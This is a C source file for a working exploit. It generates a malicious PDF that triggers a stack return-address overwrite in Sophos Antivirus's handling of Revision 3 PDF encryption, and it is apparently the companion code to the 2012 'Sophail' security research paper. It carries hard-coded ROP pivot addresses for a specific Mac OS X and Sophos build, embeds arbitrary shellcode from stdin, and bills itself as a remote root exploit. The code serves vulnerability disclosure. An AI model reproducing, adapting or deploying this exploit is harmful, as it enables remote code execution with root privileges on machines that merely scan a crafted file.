#include <stdio.h>
#include <stdint.h>
#include <strings.h>
#include <limits.h>
#include <stdarg.h>
#include <stdbool.h>
#include <zlib.h>

//
// Sophos Antivirus PDF Revision 3 Encryption Exploit.
//
// This exploit accompanies the paper Sophail: Applied attacks against Sophos
// Antivirus. Refer to the paper for further discussion.
//
// Tavis Ormandy <taviso@cmpxchg8b.com>, September 2012.
//
//

// Severity levels accepted by log_message(); the level selects the prefix
// printed in front of the message text.
enum {
    LOG_DEBUG = 0,
    LOG_INFO  = 1,
    LOG_WARN  = 2,
    LOG_ERROR = 3,
    LOG_FATAL = 4,
};

// Describes one target build: the addresses and frame offset that main()
// reads when constructing the output document.
typedef struct {
    // Human-readable name of the target, printed in the startup banner.
    const char *description;
    // Return address that main() XORs against code_pivot_addr[0] to decide
    // how many bytes differ.
    uint32_t    orig_return_addr;
    // Pivot addresses: [0] is masked and encoded into the filter chain depth,
    // [1] and [2] are embedded in the trailer's document ID.
    uint32_t    code_pivot_addr[3];
    // Byte distance added to the overwrite size to form the /Length value of
    // the encryption dictionary.
    uint32_t    frame_start_dist;
} target_t;

const target_t kTargetMountainLion = {
    .description        = "Mac OS X 10.8.2 12C60, Sophos 8.0.6, Engine 3.34.0",
    .orig_return_addr   = 0xC008A2E3,
    .frame_start_dist   = 64,
    .code_pivot_addr    = {
        0xC01C2097,     // jmp [esp-128]
        0xC00021F8,     // ebp = *esp
        0xC0001679,     // esp = *ebp+4
    },
};

// Target profile read by main(); points at the Mountain Lion entry.
const target_t *target = &kTargetMountainLion;

// Comment line that create_pdf_header() writes immediately after the %PDF
// version line.
static const char *kExploitComment =
    "% SOPHAIL: APPLIED ATTACKS AGAINST SOPHOS ANTIVIRUS";

void log_message(unsigned level, const char *fmt, ...)
{
    va_list ap;

    switch (level) {
        case LOG_DEBUG: fprintf(stderr, "[*] "); break;
        case LOG_INFO:  fprintf(stderr, "[+] "); break;
        case LOG_WARN:  fprintf(stderr, "[!] "); break;
        case LOG_ERROR: fprintf(stderr, "\a[!] "); break;
        case LOG_FATAL: fprintf(stderr, "\a[!] "); break;
    }

    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);

    // Add newline.
    fputc('\n', stderr);
    return;
}

static size_t create_pdf_header(void)
{
    static const unsigned kPDFMajorVersion = 1;
    static const unsigned kPDFMinorVersion = 4;

    log_message(LOG_DEBUG, "Creating PDF %u.%u header",
                           kPDFMajorVersion,
                           kPDFMinorVersion);

    return fprintf(stdout, "%%PDF-%u.%u\n%s\n",
                           kPDFMajorVersion,
                           kPDFMinorVersion,
                           kExploitComment);
}

// Create a PDF XRef object with the specified number and generation. The
// object will contain a filterchain of the depth specified, and the stream
// will contain the contents of the shellcode stream.
static bool create_xref_object(uint32_t objectnum,
                               uint32_t objectgen,
                               uint32_t filterdepth,
                               FILE *shellcode)
{
    int c = 0;
    int count = 0;

    // Create a new object and open a filter chain.
    fprintf(stdout, "%u %u obj << /Type /XRef /Filter [", objectnum, objectgen);

    log_message(LOG_DEBUG, "Creating xrefs object at %u %u R, filter depth %u",
                           objectnum,
                           objectgen,
                           filterdepth);

    // Create a filter chain of the specified length. The filter doesn't
    // matter, choose one from section 7.4.1 from the PDF specification. I'm
    // using "/Crypt", as it's the shortest in length.
    while (filterdepth--) {
        fprintf(stdout, "/%s", "Crypt");
    }

    // Terminate the filter chain and open a stream object.
    fprintf(stdout, "] >> stream\n");

    log_message(LOG_DEBUG, "Appending object stream for shellcode");

    // Copy the shellcode into the stream.
    while ((c = fgetc(shellcode)) != EOF) {
        fputc(c, stdout);
        count++;
    }

    // Close the stream and terminate the object.
    fprintf(stdout, "\nendstream\nendobj\n");

    log_message(LOG_DEBUG, "%u bytes of shellcode added", count);

    return true;
}

// The trailer object specifies the location of the Encryption parameters and
// the Document ID. The Document ID isn't especially useful, but we need it as
// it's stored in a predictable location and can use it to branch targets to
// pivot code.
static bool create_trlr_object(uint32_t encobjectnum,
                               uint32_t encobjectgen,
                               uint32_t secondpivot,
                               uint32_t thirdpivot)
{
    char documentid[32 + 1];

    // The document id is conveniently placed at a predictable location on the
    // stack, so we use it to store addresses we can reference in pivots. In
    // this way, even though the stack is randomized, we can reference it via
    // [esp-xyz] in gadgets.
    sprintf(documentid, "%08X414141%08X4141414141",
                        __builtin_bswap32(thirdpivot),
                        __builtin_bswap32(secondpivot));

    log_message(LOG_DEBUG, "Generating trailer, document ID will be <%s>",
                           documentid);

    // The document id must be part of a two element array, so we print it
    // twice. The Encrypt parameters are an indirect reference to the RC4
    // object created earlier.
    fprintf(stdout, "trailer << /Encrypt %u %u R /ID [ <%s> <%s> ] >>",
                    encobjectnum,
                    encobjectgen,
                    documentid,
                    documentid);

    return true;
}

// Emit `numxrefs` identical "startxref <offset> %%EOF" lines on stdout, each
// pointing at byte offset `xrefoffset` from the start of the file. Repeating
// the reference is what forces the large object list to be built.
//
// Always returns true.
bool startxref_redirect(uint32_t xrefoffset, uint32_t numxrefs)
{
    uint32_t remaining = numxrefs;

    // "%%%%" in the format produces the literal "%%" of the EOF marker.
    while (remaining > 0) {
        fprintf(stdout, "startxref %u %%%%EOF\n", xrefoffset);
        remaining--;
    }

    log_message(LOG_DEBUG, "Created %u indirect object references",
                           numxrefs);

    return true;
}

// Create the encryption dictionary with the bit length specified, see the
// description of "Standard Encryption Dictionary" in Chapter 3 of the PDF
// specification. The object is written to stdout as
// "<num> <gen> obj <</Filter /Standard /Length <bits> /V 1 /R 3>> endobj".
//
// The three pieces are written by separate statements so that their order is
// guaranteed; operands of `+` may be evaluated in any order. Returns true only
// if every write succeeded.
static bool create_arc4_object(uint32_t objectnum,
                               uint32_t objectgen,
                               uint32_t bitlength)
{
    if (fprintf(stdout, "%u %u obj <<", objectnum, objectgen) < 0) {
        return false;
    }

    if (fprintf(stdout, "/Filter /Standard /Length %u /V 1 /R 3", bitlength) < 0) {
        return false;
    }

    return fprintf(stdout, ">> endobj\n") >= 0;
}


int main(int argc, char **argv)
{
    uint32_t ret_addr_dest = 0;
    uint32_t ret_addr_diff = 0;
    uint32_t ret_addr_size = 0;
    uint32_t ret_addr_mask = 0xFFFFFFFF;
    uint32_t ret_addr_arc4 = 0x13131313;
    uint32_t header_size   = 0;
    int i;

    log_message(LOG_INFO, "-----------------------------------------------");
    log_message(LOG_INFO, "Sophos Antivirus PDF Rev. 3 Remote Root Exploit");
    log_message(LOG_INFO, "---------------------- taviso@cmpxchg8b.com ---");
    log_message(LOG_INFO, "Target: %s", target->description);

    // First, we need to calculate how many bytes of the return address we need
    // to modify. If we can perform the desired modification with a partial
    // overwrite, this reduces the exploit size and memory requirements.
    //
    // To do this, we XOR the current address and the desired address together,
    // then locate the most significant set bit. Only the different bits are
    // set, so we can measure their similarity.
    ret_addr_diff = target->orig_return_addr ^ target->code_pivot_addr[0];

    // To locate the most significant set bit, I count the number of leading
    // zeroes (clz), then subtract it from the size of the word in bits.
    ret_addr_size = 32 - __builtin_clz(ret_addr_diff);

    // To find the nearest octet boundary, we round this up, then divide by
    // CHAR_BIT.
    ret_addr_size = (ret_addr_size + CHAR_BIT - 1) / CHAR_BIT;

    // Now we know how many bytes we need to overwrite. I would be surprised if
    // a difference much higher than 2^24 will work due to the large size of
    // the PDF objects we would need to build. If you cannot find a good pivot
    // within this range, try using DEPLIB to improve your yield.
    log_message(LOG_DEBUG, "Bit delta between %#x and %#x is %#x",
                           target->orig_return_addr,
                           target->code_pivot_addr[0],
                           ret_addr_diff);

    log_message(LOG_DEBUG, "Nearest octet boundary to %#x is 2**%u-1",
                           ret_addr_diff,
                           ret_addr_size * CHAR_BIT);

    // Now we need to XOR the required address bytes with the round counter to
    // compensate for the RC4 process used in PDF encryption. As described in
    // the PDF 1.4 specification (Algorithm 3.7, step 2), for Revision 3
    // documents this counter will be 20 for each byte.
    //
    // http://partners.adobe.com/public/developer/en/pdf/PDFReference.pdf
    //
    // Therefore, our RC4 mask will always be 0x13131313 shifted the
    // appropriate number of position for the partial overwrite.
    ret_addr_mask >>= 32 - (ret_addr_size << 3);
    ret_addr_arc4 >>= 32 - (ret_addr_size << 3);

    // Use the masks to compensate the target address.
    ret_addr_dest = target->code_pivot_addr[0] & ret_addr_mask;
    ret_addr_dest = ret_addr_dest ^ ret_addr_arc4;

    log_message(LOG_DEBUG, "Address mask is %#x, ARC4 mask is %#x",
                           ret_addr_mask,
                           ret_addr_arc4);
    log_message(LOG_DEBUG, "Compensated pivot for object list will be %#x",
                           ret_addr_dest);


    // Create the PDF header and record the length for byte references.
    header_size = create_pdf_header();

    // Generate the Xref object which contains our filter chain.
    create_xref_object(0, 0, ret_addr_dest - 1, stdin);

    log_message(LOG_DEBUG, "Dumping pivot addresses...");

    // These are the gadgets that allow us to take control of execution.
    // Setting up the stack, removing address constraints, and so on.
    for (i = 0; i < 3; i++) {
        log_message(LOG_DEBUG, "\t#%u %#x", i, target->code_pivot_addr[i]);
    }

    // Print the standard encryption dictionary, and specify the distance into
    // the frame we want to overwrite.
    create_arc4_object(1,
                       0,
                       CHAR_BIT * (target->frame_start_dist + ret_addr_size));

    // Setup the Document ID, used as a convenient trampoline.
    create_trlr_object(1,
                       0,
                       target->code_pivot_addr[1], target->code_pivot_addr[2]);

    // The startxref references trigger the list of objects to be generated
    // that we use.
    startxref_redirect(header_size, 3);

    log_message(LOG_DEBUG, "Finished.");

    return 0;
}
